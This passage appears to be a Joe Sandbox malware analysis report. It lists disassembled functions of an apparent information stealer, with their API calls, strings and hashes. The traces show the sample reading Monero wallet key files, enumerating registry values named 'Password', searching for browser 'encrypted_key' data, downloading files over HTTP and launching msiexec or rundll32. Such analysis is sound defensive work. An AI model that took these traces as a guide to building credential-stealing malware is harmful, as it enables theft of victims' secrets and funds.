                        Yara matches
                        Similarity
                        • API ID: CreateGlobalStream
                        • String ID: image/jpeg
                        • API String ID: 2244384528-3785015651
                        • Opcode ID: bfdcde7aed69b3ca511aebb63c101360c0ccaaf86de209a1453f9e1c96723578
                        • Instruction ID: 7fc125d8475648eeb4df944e984dee53475b1c1fe8d3aefd5b246f24b353ec94
                        • Opcode Fuzzy Hash: bfdcde7aed69b3ca511aebb63c101360c0ccaaf86de209a1453f9e1c96723578
                        • Instruction Fuzzy Hash: F271FD75A10209AFDB58DFE4DC89FEEBBB9BF48300F108519F515A7290DB34A905CB61
                        Function 005D2E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                        • ShellExecuteEx.SHELL32(0000003C), ref: 005D31C5
                        • ShellExecuteEx.SHELL32(0000003C), ref: 005D335D
                        • ShellExecuteEx.SHELL32(0000003C), ref: 005D34EA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExecuteShell$lstrcpy
                        • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                        • API String ID: 2507796910-3625054190
                        • Opcode ID: e56eaff225ddf036b60bc95468bdfefd6c8e9a97b4f5ba2517036905f897d5c2
                        • Instruction ID: a1a86c104af4d4e65c63ca33c66e2431f4bcedba01a3b18d24c29cb43d77bdb8
                        • Opcode Fuzzy Hash: e56eaff225ddf036b60bc95468bdfefd6c8e9a97b4f5ba2517036905f897d5c2
                        • Instruction Fuzzy Hash: 2E1221718001499ADB29FBA4DC96FEEBB38BF54300F50415BF50666291EF702B8ACF56
                        Function 005D52C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005DA7E6
                          • Part of subcall function 005C6280: InternetOpenA.WININET(005E0DFE,00000001,00000000,00000000,00000000), ref: 005C62E1
                          • Part of subcall function 005C6280: StrCmpCA.SHLWAPI(?,014B0DB0), ref: 005C6303
                          • Part of subcall function 005C6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 005C6335
                          • Part of subcall function 005C6280: HttpOpenRequestA.WININET(00000000,GET,?,014B0588,00000000,00000000,00400100,00000000), ref: 005C6385
                          • Part of subcall function 005C6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005C63BF
                          • Part of subcall function 005C6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005C63D1
                          • Part of subcall function 005DA8A0: lstrcpy.KERNEL32(?,005E0E17), ref: 005DA905
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 005D5318
                        • lstrlen.KERNEL32(00000000), ref: 005D532F
                          • Part of subcall function 005D8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 005D8E52
                        • StrStrA.SHLWAPI(00000000,00000000), ref: 005D5364
                        • lstrlen.KERNEL32(00000000), ref: 005D5383
                        • lstrlen.KERNEL32(00000000), ref: 005D53AE
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                        • API String ID: 3240024479-1526165396
                        • Opcode ID: 96c36ae01d0efaeae5a1fe293ce8141e862bc628661de0458040006178366cea
                        • Instruction ID: b1c079da475611d66b9bd1d0a068fcadb480168c7b0de69f6ccacfe662958ebf
                        • Opcode Fuzzy Hash: 96c36ae01d0efaeae5a1fe293ce8141e862bc628661de0458040006178366cea
                        • Instruction Fuzzy Hash: BC51F13091014A9BCB28FF68DD9AEEE7B79BF90300F50401BF80656692EF346B45DB56
                        Function 005D12D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen
                        • String ID:
                        • API String ID: 2001356338-0
                        • Opcode ID: 1faad96b10de5add7fbfc2b4690a9ee67bc0de9c00b0e76e76f91e2e8ae52417
                        • Instruction ID: 4f4c219b3c9e9bcf693b31064c0578ac200cc1d6c6301e941a47ff6f27f88431
                        • Opcode Fuzzy Hash: 1faad96b10de5add7fbfc2b4690a9ee67bc0de9c00b0e76e76f91e2e8ae52417
                        • Instruction Fuzzy Hash: B6C1A9B59002199BCB24EF64DC8DFEA7B79BB94304F00459BF50A67341EB70AA85CF91
                        Function 005D4280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005D8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 005D8E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 005D42EC
                        • lstrcat.KERNEL32(?,014B0468), ref: 005D430B
                        • lstrcat.KERNEL32(?,?), ref: 005D431F
                        • lstrcat.KERNEL32(?,014AEE60), ref: 005D4333
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                          • Part of subcall function 005D8D90: GetFileAttributesA.KERNEL32(00000000,?,005C1B54,?,?,005E564C,?,?,005E0E1F), ref: 005D8D9F
                          • Part of subcall function 005C9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 005C9D39
                          • Part of subcall function 005C99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005C99EC
                          • Part of subcall function 005C99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 005C9A11
                          • Part of subcall function 005C99C0: LocalAlloc.KERNEL32(00000040,?), ref: 005C9A31
                          • Part of subcall function 005C99C0: ReadFile.KERNEL32(000000FF,?,00000000,005C148F,00000000), ref: 005C9A5A
                          • Part of subcall function 005C99C0: LocalFree.KERNEL32(005C148F), ref: 005C9A90
                          • Part of subcall function 005C99C0: CloseHandle.KERNEL32(000000FF), ref: 005C9A9A
                          • Part of subcall function 005D93C0: GlobalAlloc.KERNEL32(00000000,005D43DD,005D43DD), ref: 005D93D3
                        • StrStrA.SHLWAPI(?,014B05E8), ref: 005D43F3
                        • GlobalFree.KERNEL32(?), ref: 005D4512
                          • Part of subcall function 005C9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N\,00000000,00000000), ref: 005C9AEF
                          • Part of subcall function 005C9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,005C4EEE,00000000,?), ref: 005C9B01
                          • Part of subcall function 005C9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N\,00000000,00000000), ref: 005C9B2A
                          • Part of subcall function 005C9AC0: LocalFree.KERNEL32(?,?,?,?,005C4EEE,00000000,?), ref: 005C9B3F
                        • lstrcat.KERNEL32(?,00000000), ref: 005D44A3
                        • StrCmpCA.SHLWAPI(?,005E08D1), ref: 005D44C0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 005D44D2
                        • lstrcat.KERNEL32(00000000,?), ref: 005D44E5
                        • lstrcat.KERNEL32(00000000,005E0FB8), ref: 005D44F4
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                        • String ID:
                        • API String ID: 3541710228-0
                        • Opcode ID: f2be9bef41cfbab8dfb2b174410d218deb0a6f3545ff69279de70756d0a05bdb
                        • Instruction ID: 398ca6b4a2da3ab121a538974ef873aa6d984f11ac97f15d825d73eef41bd380
                        • Opcode Fuzzy Hash: f2be9bef41cfbab8dfb2b174410d218deb0a6f3545ff69279de70756d0a05bdb
                        • Instruction Fuzzy Hash: 73715976900209ABCB24FBE4DC99FEE7779BB88300F048599F50597181EA74DB45CF91
                        Function 005C1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005C12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 005C12B4
                          • Part of subcall function 005C12A0: RtlAllocateHeap.NTDLL(00000000), ref: 005C12BB
                          • Part of subcall function 005C12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 005C12D7
                          • Part of subcall function 005C12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 005C12F5
                          • Part of subcall function 005C12A0: RegCloseKey.ADVAPI32(?), ref: 005C12FF
                        • lstrcat.KERNEL32(?,00000000), ref: 005C134F
                        • lstrlen.KERNEL32(?), ref: 005C135C
                        • lstrcat.KERNEL32(?,.keys), ref: 005C1377
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                          • Part of subcall function 005DA9B0: lstrlen.KERNEL32(?,014A8918,?,\Monero\wallet.keys,005E0E17), ref: 005DA9C5
                          • Part of subcall function 005DA9B0: lstrcpy.KERNEL32(00000000), ref: 005DAA04
                          • Part of subcall function 005DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005DAA12
                          • Part of subcall function 005DA8A0: lstrcpy.KERNEL32(?,005E0E17), ref: 005DA905
                          • Part of subcall function 005D8B60: GetSystemTime.KERNEL32(005E0E1A,014AFBA0,005E05AE,?,?,005C13F9,?,0000001A,005E0E1A,00000000,?,014A8918,?,\Monero\wallet.keys,005E0E17), ref: 005D8B86
                          • Part of subcall function 005DA920: lstrcpy.KERNEL32(00000000,?), ref: 005DA972
                          • Part of subcall function 005DA920: lstrcat.KERNEL32(00000000), ref: 005DA982
                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 005C1465
                          • Part of subcall function 005DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005DA7E6
                          • Part of subcall function 005C99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005C99EC
                          • Part of subcall function 005C99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 005C9A11
                          • Part of subcall function 005C99C0: LocalAlloc.KERNEL32(00000040,?), ref: 005C9A31
                          • Part of subcall function 005C99C0: ReadFile.KERNEL32(000000FF,?,00000000,005C148F,00000000), ref: 005C9A5A
                          • Part of subcall function 005C99C0: LocalFree.KERNEL32(005C148F), ref: 005C9A90
                          • Part of subcall function 005C99C0: CloseHandle.KERNEL32(000000FF), ref: 005C9A9A
                        • DeleteFileA.KERNEL32(00000000), ref: 005C14EF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                        • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                        • API String ID: 3478931302-218353709
                        • Opcode ID: 704df6cb4cc3a8e0ef77065a4289ffc57db24aa58f3fbf69a79b1f7cb1ac8002
                        • Instruction ID: 3344e413ebfab957d9d9b610c9c4af861c3951e155cab66f3c07980a21643577
                        • Opcode Fuzzy Hash: 704df6cb4cc3a8e0ef77065a4289ffc57db24aa58f3fbf69a79b1f7cb1ac8002
                        • Instruction Fuzzy Hash: 245168B1D5011A5BCB29FB64DC96FEE773CBF94300F40419AB60A62182EE705B85CF96
                        Function 005C75D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005C72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 005C733A
                          • Part of subcall function 005C72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 005C73B1
                          • Part of subcall function 005C72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 005C740D
                          • Part of subcall function 005C72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 005C7452
                          • Part of subcall function 005C72D0: HeapFree.KERNEL32(00000000), ref: 005C7459
                        • lstrcat.KERNEL32(00000000,005E17FC), ref: 005C7606
                        • lstrcat.KERNEL32(00000000,00000000), ref: 005C7648
                        • lstrcat.KERNEL32(00000000, : ), ref: 005C765A
                        • lstrcat.KERNEL32(00000000,00000000), ref: 005C768F
                        • lstrcat.KERNEL32(00000000,005E1804), ref: 005C76A0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 005C76D3
                        • lstrcat.KERNEL32(00000000,005E1808), ref: 005C76ED
                        • task.LIBCPMTD ref: 005C76FB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                        • String ID: :
                        • API String ID: 2677904052-3653984579
                        • Opcode ID: fcfc04ad5af4750e72697f43cd7f90470cbd0e7ec49665670af5ba0c646f4ebf
                        • Instruction ID: e0692ceb8baf07dc07af705098f80834455e90eb577a0491554681a672c3cb15
                        • Opcode Fuzzy Hash: fcfc04ad5af4750e72697f43cd7f90470cbd0e7ec49665670af5ba0c646f4ebf
                        • Instruction Fuzzy Hash: 70312D75A0020ADFCB48EBF4DC99EFE7B79FB98301B144118E112A72A0DA34E946CB51
                        Function 005D8100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,014B0210,00000000,?,005E0E2C,00000000,?,00000000), ref: 005D8130
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005D8137
                        • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 005D8158
                        • __aulldiv.LIBCMT ref: 005D8172
                        • __aulldiv.LIBCMT ref: 005D8180
                        • wsprintfA.USER32 ref: 005D81AC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                        • String ID: %d MB$@
                        • API String ID: 2774356765-3474575989
                        • Opcode ID: e44cb97c0e727e0b170e5c4439766db8a64c7d6a00ca21e7ed56060541ce86a6
                        • Instruction ID: 94aa8f386ca70ade9d9a92458e975ffec6823c8f2565f8e8b0bf44b4f611fde5
                        • Opcode Fuzzy Hash: e44cb97c0e727e0b170e5c4439766db8a64c7d6a00ca21e7ed56060541ce86a6
                        • Instruction Fuzzy Hash: CA213EB1E44318ABDB14DFD8CC49FAEBB78FB44B00F10461AF615BB280C77859018BA5
                        Function 005C60A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005DA7E6
                          • Part of subcall function 005C47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 005C4839
                          • Part of subcall function 005C47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 005C4849
                        • InternetOpenA.WININET(005E0DF7,00000001,00000000,00000000,00000000), ref: 005C610F
                        • StrCmpCA.SHLWAPI(?,014B0DB0), ref: 005C6147
                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 005C618F
                        • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 005C61B3
                        • InternetReadFile.WININET(?,?,00000400,?), ref: 005C61DC
                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 005C620A
                        • CloseHandle.KERNEL32(?,?,00000400), ref: 005C6249
                        • InternetCloseHandle.WININET(?), ref: 005C6253
                        • InternetCloseHandle.WININET(00000000), ref: 005C6260
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                        • String ID:
                        • API String ID: 2507841554-0
                        • Opcode ID: f20b1617da5a1a9c8335edfe46f8db9fddcc4689cbade0d0e66c7bb7b1baa46a
                        • Instruction ID: bc8e03ce1335afe1df1dac2262ac110d5126d35a0c8cbbbd8ab4f11034f1981d
                        • Opcode Fuzzy Hash: f20b1617da5a1a9c8335edfe46f8db9fddcc4689cbade0d0e66c7bb7b1baa46a
                        • Instruction Fuzzy Hash: A6514EB1900218AFDB24DF90DC49FEE7BB8FB44701F108099A605A72C1DB746B85CF95
                        Function 005C72D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 005C733A
